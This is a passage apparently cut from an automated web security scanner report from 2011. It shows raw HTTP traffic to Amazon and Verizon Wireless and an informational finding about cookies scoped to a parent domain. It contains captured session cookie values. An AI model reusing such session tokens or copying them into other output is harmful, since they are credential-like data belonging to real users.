User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mobile.microsoft.com/windowsphone/en-us/buy/phonedetails.mspx?id=1685&np=1569-1684-1536-1537-1538-1568-1690-1685&WT.mpe=oHP-car

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 12:57:36 GMT
Server: Server
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding,User-Agent
Set-Cookie: ubid-main=179-9570509-7108862; Domain=.amazon.com; Expires=Sun, 13-Jul-2031 12:57:36 GMT; Path=/
Content-Length: 111404


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
   <title>Ama
...[SNIP]...

9.20. http://www.verizonwireless.com/b2c/vzwfly  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/vzwfly

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /b2c/vzwfly HTTP/1.1
Host: www.verizonwireless.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?&item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: GLOBALID=U0rDszSw9SV68cj1hODGnDTHalYNM%2FB%2FuJn%2B7rVAcc%2Fc6GD2xpZ0%2Bs4Orh8A1O1u; mbox=PC#1310569554435-90226.17#1312203471|check#true#1310993931|session#1310993870949-319721#1310995731; CP=null*; __utma=96859928.1761841238.1310569615.1310569615.1310993885.2; __utmz=96859928.1310993885.2.2.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; NSC_xxx_hwt=ffffffffa17b0cd945525d5f4f58455e445a4a420000; JSESSIONIDB2C=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1; SESSION_VALUE=m2QBTktQzDgLsGGkf18drMdNkvTHdlJhykC5DM7rpkj8rQVPBXVy!-1801843931!mercury!5102!-1!1310993856497; TIME_CHECKER=1310993856500; NSC_xxx_xmt_c2d_mcwt=ffffffff09f7172a45525d5f4f58455e445a4a4225de; gnVersion=2011Jul12104957; __utmb=96859928; __utmc=96859928; chkcookie=1310993892258
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

query=item%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635%26go%3D%2Fstore%2Fcontroller%26&fd=&go=%2Fstore%2Fcontroller&zipcode=10010&rememberMyZip=&state=&prevstate=&change=&filter=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="Set-Cookie"
Connection: close
Date: Mon, 18 Jul 2011 13:01:19 GMT
Location: http://www.verizonwireless.com:80/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Set-Cookie: CARTVIEW=FALSE; domain=.verizonwireless.com; expires=Monday, 18-Jul-2011 13:21:19 GMT; path=/
Set-Cookie: ZIPCODE=10010; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: CITY=New York; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
Set-Cookie: STATE=NY; domain=.verizonwireless.com; expires=Sunday, 16-Oct-2011 13:01:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 439

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.verizonwireless.com:80/
...[SNIP]...

10. Cookie without HttpOnly flag set  previous  next
There are 39 instances of this issue: